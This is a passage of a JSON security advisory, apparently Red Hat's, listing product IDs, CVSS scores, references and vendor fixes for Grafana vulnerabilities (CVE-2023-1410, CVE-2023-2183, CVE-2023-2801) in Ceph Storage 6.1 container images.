"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:04e7e7a046da793f667daa0d1eb8dc90ea984dcd1bdefc8a7b96441a6251b280_amd64",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:6f6ed4e34b8450b5af74cab6bab790013006269cb997883fc50f5c20c1f5dd8d_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:fd567a237640c49c3cb5d392aa995069eb6d7398bffb2fe982f57563b640d630_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:9276234cb0599b75d0adc88c7b1882ff3da6742306a30f26dade3f9bde06ec7e_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:93b546b7d97fd7fdaf9aef486218350817697a6237cbc3ff512eef40ef772a3a_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:d6233ee14663867808ca616c9327278af99e0439f0781b548be35e6ab5777de2_amd64",
"9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:39e1eb86a6cc6eaa31018a13f86bbb676ec26250d5daf116e3be6d6d194bfe42_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:a47193626427bfe8f686c9f591248d082271c0d20aed96aa268bf7a03b9123d8_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:ca759591794df7f94b67bf798d7d27dd6d2b45d49b8ef8511e2bf51f78672d7e_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2023-1410"
},
{
"category": "external",
"summary": "RHBZ#2181117",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2181117"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2023-1410",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-1410"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2023-1410",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-1410"
},
{
"category": "external",
"summary": "https://github.com/grafana/bugbounty/security/advisories/GHSA-qrrg-gw7w-vp76",
"url": "https://github.com/grafana/bugbounty/security/advisories/GHSA-qrrg-gw7w-vp76"
},
{
"category": "external",
"summary": "https://grafana.com/blog/2023/03/22/grafana-security-release-new-versions-with-security-fixes-for-cve-2023-1410/",
"url": "https://grafana.com/blog/2023/03/22/grafana-security-release-new-versions-with-security-fixes-for-cve-2023-1410/"
}
],
"release_date": "2023-03-22T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2023-12-12T13:55:37+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/documentation/en-us/red_hat_ceph_storage/6\n\nFor supported configurations, refer to:\n\nhttps://access.redhat.com/articles/1548993",
"product_ids": [
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:4dc1e2ace5946178fae29c87e2f86467594833e27ddfef8a005273eb9a1bee45_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:72ebf29aa3a85cf49949379958744a699e1f572f79abf75e7cb8094ceecf074e_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:ba574717bd9890dcf1677c9b56d45a2047bb1f6a72a0bb5b8e38c6f3f2db4884_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2023:7741"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 4.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:49e943d69210eb9f4218272f64cc2b9a100bb52416784c417b241c7dcd0eeb23_amd64",
"9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:561fba3667ff302316ecef3dc7a80202ec5b854b347e4cbc5d2d4a2ad4419ed3_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:e12cb06f04ac2870d5c387612f4aab65438c4b8044337ab8c55e924dc273ee6b_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:4dc1e2ace5946178fae29c87e2f86467594833e27ddfef8a005273eb9a1bee45_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:72ebf29aa3a85cf49949379958744a699e1f572f79abf75e7cb8094ceecf074e_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:ba574717bd9890dcf1677c9b56d45a2047bb1f6a72a0bb5b8e38c6f3f2db4884_amd64",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:0809ac10fd225656d8fec0002f71c41f7a07d9c5be0c0affd5740cdae43efcf8_amd64",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:6c58ed8e6779027d62bca2dab2de0336ee630257dc903c0ff8069ec986395f47_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:f3eb950ff155132b8d113853d05a917a4e949fa80156bbbdda8e61a5a7d18799_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:04e7e7a046da793f667daa0d1eb8dc90ea984dcd1bdefc8a7b96441a6251b280_amd64",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:6f6ed4e34b8450b5af74cab6bab790013006269cb997883fc50f5c20c1f5dd8d_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:fd567a237640c49c3cb5d392aa995069eb6d7398bffb2fe982f57563b640d630_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:9276234cb0599b75d0adc88c7b1882ff3da6742306a30f26dade3f9bde06ec7e_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:93b546b7d97fd7fdaf9aef486218350817697a6237cbc3ff512eef40ef772a3a_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:d6233ee14663867808ca616c9327278af99e0439f0781b548be35e6ab5777de2_amd64",
"9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:39e1eb86a6cc6eaa31018a13f86bbb676ec26250d5daf116e3be6d6d194bfe42_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:a47193626427bfe8f686c9f591248d082271c0d20aed96aa268bf7a03b9123d8_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:ca759591794df7f94b67bf798d7d27dd6d2b45d49b8ef8511e2bf51f78672d7e_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "grafana: Stored XSS in Graphite FunctionDescription tooltip"
},
{
"acknowledgments": [
{
"names": [
"Grafana Security Team"
],
"summary": "Acknowledged by upstream."
}
],
"cve": "CVE-2023-2183",
"cwe": {
"id": "CWE-284",
"name": "Improper Access Control"
},
"discovery_date": "2023-05-29T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:49e943d69210eb9f4218272f64cc2b9a100bb52416784c417b241c7dcd0eeb23_amd64",
"9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:561fba3667ff302316ecef3dc7a80202ec5b854b347e4cbc5d2d4a2ad4419ed3_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:e12cb06f04ac2870d5c387612f4aab65438c4b8044337ab8c55e924dc273ee6b_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:0809ac10fd225656d8fec0002f71c41f7a07d9c5be0c0affd5740cdae43efcf8_amd64",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:6c58ed8e6779027d62bca2dab2de0336ee630257dc903c0ff8069ec986395f47_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:f3eb950ff155132b8d113853d05a917a4e949fa80156bbbdda8e61a5a7d18799_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:04e7e7a046da793f667daa0d1eb8dc90ea984dcd1bdefc8a7b96441a6251b280_amd64",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:6f6ed4e34b8450b5af74cab6bab790013006269cb997883fc50f5c20c1f5dd8d_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:fd567a237640c49c3cb5d392aa995069eb6d7398bffb2fe982f57563b640d630_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:9276234cb0599b75d0adc88c7b1882ff3da6742306a30f26dade3f9bde06ec7e_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:93b546b7d97fd7fdaf9aef486218350817697a6237cbc3ff512eef40ef772a3a_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:d6233ee14663867808ca616c9327278af99e0439f0781b548be35e6ab5777de2_amd64",
"9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:39e1eb86a6cc6eaa31018a13f86bbb676ec26250d5daf116e3be6d6d194bfe42_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:a47193626427bfe8f686c9f591248d082271c0d20aed96aa268bf7a03b9123d8_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:ca759591794df7f94b67bf798d7d27dd6d2b45d49b8ef8511e2bf51f78672d7e_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2210848"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in grafana. This issue may allow a malicious user to craft a request to the API that enables them to send alert messages via the \"API Alert - Test\".",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "grafana: missing access control allows test alerts by underprivileged user",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "OpenShift ServiceMesh (OSSM) has switched to using upstream rhel rpms for grafana, and is no longer maintaining the servicemesh-grafana package. Hence, it is marked as affected/won\u0027tfix.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:4dc1e2ace5946178fae29c87e2f86467594833e27ddfef8a005273eb9a1bee45_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:72ebf29aa3a85cf49949379958744a699e1f572f79abf75e7cb8094ceecf074e_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:ba574717bd9890dcf1677c9b56d45a2047bb1f6a72a0bb5b8e38c6f3f2db4884_amd64"
],
"known_not_affected": [
"9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:49e943d69210eb9f4218272f64cc2b9a100bb52416784c417b241c7dcd0eeb23_amd64",
"9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:561fba3667ff302316ecef3dc7a80202ec5b854b347e4cbc5d2d4a2ad4419ed3_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:e12cb06f04ac2870d5c387612f4aab65438c4b8044337ab8c55e924dc273ee6b_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:0809ac10fd225656d8fec0002f71c41f7a07d9c5be0c0affd5740cdae43efcf8_amd64",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:6c58ed8e6779027d62bca2dab2de0336ee630257dc903c0ff8069ec986395f47_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:f3eb950ff155132b8d113853d05a917a4e949fa80156bbbdda8e61a5a7d18799_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:04e7e7a046da793f667daa0d1eb8dc90ea984dcd1bdefc8a7b96441a6251b280_amd64",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:6f6ed4e34b8450b5af74cab6bab790013006269cb997883fc50f5c20c1f5dd8d_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:fd567a237640c49c3cb5d392aa995069eb6d7398bffb2fe982f57563b640d630_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:9276234cb0599b75d0adc88c7b1882ff3da6742306a30f26dade3f9bde06ec7e_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:93b546b7d97fd7fdaf9aef486218350817697a6237cbc3ff512eef40ef772a3a_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:d6233ee14663867808ca616c9327278af99e0439f0781b548be35e6ab5777de2_amd64",
"9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:39e1eb86a6cc6eaa31018a13f86bbb676ec26250d5daf116e3be6d6d194bfe42_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:a47193626427bfe8f686c9f591248d082271c0d20aed96aa268bf7a03b9123d8_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:ca759591794df7f94b67bf798d7d27dd6d2b45d49b8ef8511e2bf51f78672d7e_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2023-2183"
},
{
"category": "external",
"summary": "RHBZ#2210848",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2210848"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2023-2183",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-2183"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2023-2183",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-2183"
},
{
"category": "external",
"summary": "https://grafana.com/security/security-advisories/cve-2023-2183/",
"url": "https://grafana.com/security/security-advisories/cve-2023-2183/"
}
],
"release_date": "2023-06-06T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2023-12-12T13:55:37+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/documentation/en-us/red_hat_ceph_storage/6\n\nFor supported configurations, refer to:\n\nhttps://access.redhat.com/articles/1548993",
"product_ids": [
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:4dc1e2ace5946178fae29c87e2f86467594833e27ddfef8a005273eb9a1bee45_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:72ebf29aa3a85cf49949379958744a699e1f572f79abf75e7cb8094ceecf074e_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:ba574717bd9890dcf1677c9b56d45a2047bb1f6a72a0bb5b8e38c6f3f2db4884_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2023:7741"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N",
"version": "3.1"
},
"products": [
"9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:49e943d69210eb9f4218272f64cc2b9a100bb52416784c417b241c7dcd0eeb23_amd64",
"9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:561fba3667ff302316ecef3dc7a80202ec5b854b347e4cbc5d2d4a2ad4419ed3_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:e12cb06f04ac2870d5c387612f4aab65438c4b8044337ab8c55e924dc273ee6b_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:4dc1e2ace5946178fae29c87e2f86467594833e27ddfef8a005273eb9a1bee45_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:72ebf29aa3a85cf49949379958744a699e1f572f79abf75e7cb8094ceecf074e_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:ba574717bd9890dcf1677c9b56d45a2047bb1f6a72a0bb5b8e38c6f3f2db4884_amd64",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:0809ac10fd225656d8fec0002f71c41f7a07d9c5be0c0affd5740cdae43efcf8_amd64",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:6c58ed8e6779027d62bca2dab2de0336ee630257dc903c0ff8069ec986395f47_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:f3eb950ff155132b8d113853d05a917a4e949fa80156bbbdda8e61a5a7d18799_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:04e7e7a046da793f667daa0d1eb8dc90ea984dcd1bdefc8a7b96441a6251b280_amd64",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:6f6ed4e34b8450b5af74cab6bab790013006269cb997883fc50f5c20c1f5dd8d_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:fd567a237640c49c3cb5d392aa995069eb6d7398bffb2fe982f57563b640d630_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:9276234cb0599b75d0adc88c7b1882ff3da6742306a30f26dade3f9bde06ec7e_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:93b546b7d97fd7fdaf9aef486218350817697a6237cbc3ff512eef40ef772a3a_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:d6233ee14663867808ca616c9327278af99e0439f0781b548be35e6ab5777de2_amd64",
"9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:39e1eb86a6cc6eaa31018a13f86bbb676ec26250d5daf116e3be6d6d194bfe42_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:a47193626427bfe8f686c9f591248d082271c0d20aed96aa268bf7a03b9123d8_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:ca759591794df7f94b67bf798d7d27dd6d2b45d49b8ef8511e2bf51f78672d7e_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "grafana: missing access control allows test alerts by underprivileged user"
},
{
"acknowledgments": [
{
"names": [
"Grafana Security Team"
],
"summary": "Acknowledged by upstream."
}
],
"cve": "CVE-2023-2801",
"cwe": {
"id": "CWE-820",
"name": "Missing Synchronization"
},
"discovery_date": "2023-05-29T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:49e943d69210eb9f4218272f64cc2b9a100bb52416784c417b241c7dcd0eeb23_amd64",
"9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:561fba3667ff302316ecef3dc7a80202ec5b854b347e4cbc5d2d4a2ad4419ed3_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:e12cb06f04ac2870d5c387612f4aab65438c4b8044337ab8c55e924dc273ee6b_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:0809ac10fd225656d8fec0002f71c41f7a07d9c5be0c0affd5740cdae43efcf8_amd64",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:6c58ed8e6779027d62bca2dab2de0336ee630257dc903c0ff8069ec986395f47_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:f3eb950ff155132b8d113853d05a917a4e949fa80156bbbdda8e61a5a7d18799_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:04e7e7a046da793f667daa0d1eb8dc90ea984dcd1bdefc8a7b96441a6251b280_amd64",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:6f6ed4e34b8450b5af74cab6bab790013006269cb997883fc50f5c20c1f5dd8d_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:fd567a237640c49c3cb5d392aa995069eb6d7398bffb2fe982f57563b640d630_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:9276234cb0599b75d0adc88c7b1882ff3da6742306a30f26dade3f9bde06ec7e_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:93b546b7d97fd7fdaf9aef486218350817697a6237cbc3ff512eef40ef772a3a_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:d6233ee14663867808ca616c9327278af99e0439f0781b548be35e6ab5777de2_amd64",
"9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:39e1eb86a6cc6eaa31018a13f86bbb676ec26250d5daf116e3be6d6d194bfe42_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:a47193626427bfe8f686c9f591248d082271c0d20aed96aa268bf7a03b9123d8_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:ca759591794df7f94b67bf798d7d27dd6d2b45d49b8ef8511e2bf51f78672d7e_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2210840"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in grafana. This issue occurs when sending an API call to the /ds/query or public dashboard query endpoint that has mixed queries, such as having two or more distinct data sources in one API call. As a result, the Grafana instance will crash. Currently, the only feature that uses mixed queries within Grafana is public dashboards, but it is also possible to trigger this issue by calling the API directly.\r\nIf public dashboards are enabled, reproduction requires a public dashboard to be under a heavy load. If public dashboards are disabled, reproduction only occurs when the /ds/query endpoint with a mixed query payload is under a heavy load with a load testing script.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "grafana: data source proxy race condition",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "- In OpenShift Container Platform (OCP), Red Hat Advanced Cluster Management for Kubernetes (RHACM), and OpenShift ServiceMesh (OSSM) the grafana components are protected by OpenShift OAuth that reduces the impact of this flaw to Moderate.\n- OpenShift ServiceMesh (OSSM) has switched to using upstream rhel rpms for grafana and is no longer maintaining the servicemesh-grafana package. Hence, it is marked as affected/won\u0027tfix.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:4dc1e2ace5946178fae29c87e2f86467594833e27ddfef8a005273eb9a1bee45_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:72ebf29aa3a85cf49949379958744a699e1f572f79abf75e7cb8094ceecf074e_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:ba574717bd9890dcf1677c9b56d45a2047bb1f6a72a0bb5b8e38c6f3f2db4884_amd64"
],
"known_not_affected": [
"9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:49e943d69210eb9f4218272f64cc2b9a100bb52416784c417b241c7dcd0eeb23_amd64",
"9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:561fba3667ff302316ecef3dc7a80202ec5b854b347e4cbc5d2d4a2ad4419ed3_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:e12cb06f04ac2870d5c387612f4aab65438c4b8044337ab8c55e924dc273ee6b_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:0809ac10fd225656d8fec0002f71c41f7a07d9c5be0c0affd5740cdae43efcf8_amd64",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:6c58ed8e6779027d62bca2dab2de0336ee630257dc903c0ff8069ec986395f47_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:f3eb950ff155132b8d113853d05a917a4e949fa80156bbbdda8e61a5a7d18799_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:04e7e7a046da793f667daa0d1eb8dc90ea984dcd1bdefc8a7b96441a6251b280_amd64",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:6f6ed4e34b8450b5af74cab6bab790013006269cb997883fc50f5c20c1f5dd8d_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:fd567a237640c49c3cb5d392aa995069eb6d7398bffb2fe982f57563b640d630_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:9276234cb0599b75d0adc88c7b1882ff3da6742306a30f26dade3f9bde06ec7e_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:93b546b7d97fd7fdaf9aef486218350817697a6237cbc3ff512eef40ef772a3a_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:d6233ee14663867808ca616c9327278af99e0439f0781b548be35e6ab5777de2_amd64",
"9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:39e1eb86a6cc6eaa31018a13f86bbb676ec26250d5daf116e3be6d6d194bfe42_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:a47193626427bfe8f686c9f591248d082271c0d20aed96aa268bf7a03b9123d8_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:ca759591794df7f94b67bf798d7d27dd6d2b45d49b8ef8511e2bf51f78672d7e_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2023-2801"
},
{
"category": "external",
"summary": "RHBZ#2210840",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2210840"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2023-2801",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-2801"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2023-2801",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-2801"
},
{
"category": "external",
"summary": "https://grafana.com/security/security-advisories/cve-2023-2801/",
"url": "https://grafana.com/security/security-advisories/cve-2023-2801/"
}
],
"release_date": "2023-06-06T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2023-12-12T13:55:37+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/documentation/en-us/red_hat_ceph_storage/6\n\nFor supported configurations, refer to:\n\nhttps://access.redhat.com/articles/1548993",
"product_ids": [
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:4dc1e2ace5946178fae29c87e2f86467594833e27ddfef8a005273eb9a1bee45_s390x",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:72ebf29aa3a85cf49949379958744a699e1f572f79abf75e7cb8094ceecf074e_ppc64le",
"9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:ba574717bd9890dcf1677c9b56d45a2047bb1f6a72a0bb5b8e38c6f3f2db4884_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2023:7741"
},
{
"category": "workaround",
"details": "Block mixed query requests and patch to disable mixed query concurrent calls",
"product_ids": [
